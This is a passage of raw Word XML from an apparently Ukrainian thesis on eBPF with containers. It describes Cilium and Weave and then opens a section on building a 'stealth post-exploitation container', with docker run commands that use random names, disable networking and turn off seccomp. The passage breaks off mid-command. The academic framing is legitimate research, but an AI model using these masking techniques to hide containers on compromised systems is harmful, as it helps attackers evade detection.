          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.5.</w:t>
      </w:r>
      <w:r w:rsidR="000E2E96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: Це один із популярних інструментів, який використовує eBPF для мережевого моніторингу і безпеки в Kubernetes-кластерах. Cilium активно використовує eBPF для реалізації мікросегментації мережі, забезпечення безпеки на рівні контейнерів і сервісів. Його інтеграція з Kubernetes дозволяє використовувати eBPF для реалізації новітніх підходів до безпеки та управління мережею на рівні контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2E96" w:rsidRDefault="000E2E96" w:rsidP="000E2E96">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3134958" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="17" name="Рисунок 17" descr="Cilium 1.0: Bringing the BPF Revolution to Kubernetes Networking and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lium 1.0: Bringing the BPF Revolution to Kubernetes Networking and  Security"/>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204" r="5301"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3151059" cy="2744524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2E96" w:rsidRPr="0095301E" w:rsidRDefault="0095301E" w:rsidP="00994980">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994980" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Cilium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2E96" w:rsidRDefault="000E2E96" w:rsidP="00AA5B2B">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AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="00F35B33" w:rsidP="00AA5B2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 Weave </w:t>
      </w:r>
      <w:r w:rsidR="00994980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">(Рис. </w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00994980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: Це ще одна популярна мережа для контейнерів, яка може бути використана разом з eBPF для моніторингу та оптимізації мережевого трафіку. Вона забезпечує мережеву ізоляцію між контейнерами та </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>має механізми для інтеграції з eBPF для досягнення гнучкішої та більш детальної видимості мережі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="00994980" w:rsidP="00994980">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3154971" cy="3594100"/>
            <wp:effectExtent l="0" t="0" r="762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57989" cy="3597538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994980" w:rsidRPr="0095301E" w:rsidRDefault="0095301E" w:rsidP="00994980">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6. – </w:t>
      </w:r>
      <w:r w:rsidR="00994980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Weave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994980" w:rsidRDefault="00994980" w:rsidP="00AA5B2B">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0726E8" w:rsidRDefault="00994980" w:rsidP="00AA5B2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Отже, і</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>нтеграція eBPF з Docker, Kubernetes та іншими платформами для оркестрації контейнерів надає значні переваги, зокрема в галузі безпеки, моніторингу та оптимізації мережі. Проте цей процес супроводжується низкою технічних викликів, таких як обмеження доступу до ядра хоста, необхідність використання підвищених привілеїв, ізоляція між контейнерами та вимоги до впровадження ефективних механізмів безпеки. Врахування цих викликів при плануванні інтеграції eBPF в контейнеризовані середовища дозволяє значно покращити ефективність і безпеку таких систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006566A" w:rsidRDefault="0006566A" w:rsidP="00AA5B2B">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06566A" w:rsidRPr="0006566A" w:rsidRDefault="0006566A" w:rsidP="0006566A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006566A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. Побудова </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006566A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>стелс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006566A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006566A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>постексплуатаційного</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006566A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006566A" w:rsidRDefault="0006566A" w:rsidP="00AA5B2B">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BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="0095301E" w:rsidP="00BB02FF">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95301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Стелс-постек</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>сплуатаційний контейнер</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> це контейнер, який використовується з метою прихованої експлуатації або компрометації системи після її успішного зламу. Такий контейнер має особливу архітектуру, яка </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>дозволяє зловмиснику залишатися непоміченим в системі, здійснюючи свої дії в умовах мінімального впливу на загальну інфраструктуру. Стелс-контейнер може бути частиною більш широкої стратегії прихованого доступу та маніпуляцій з хост-системою або іншими контейнерами, забезпечуючи певний рівень захисту від виявлення або моніторингу</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [18]</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="0095301E" w:rsidP="00BB02FF">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95301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Основні компоненти стелс-постексплуатаційного контейнера</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> які були застосовані</w:t>
      </w:r>
      <w:r w:rsidR="00AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, як упереджувальні заходи,</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в проекті</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [19]</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="00BB02FF">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 Ізоляція та маскування</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) --network none --cap-drop ALL --security-opt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=unconfined my-hidden-container</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) --network none --cap-drop ALL --security-opt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=unconfined my-hidden-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>conta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
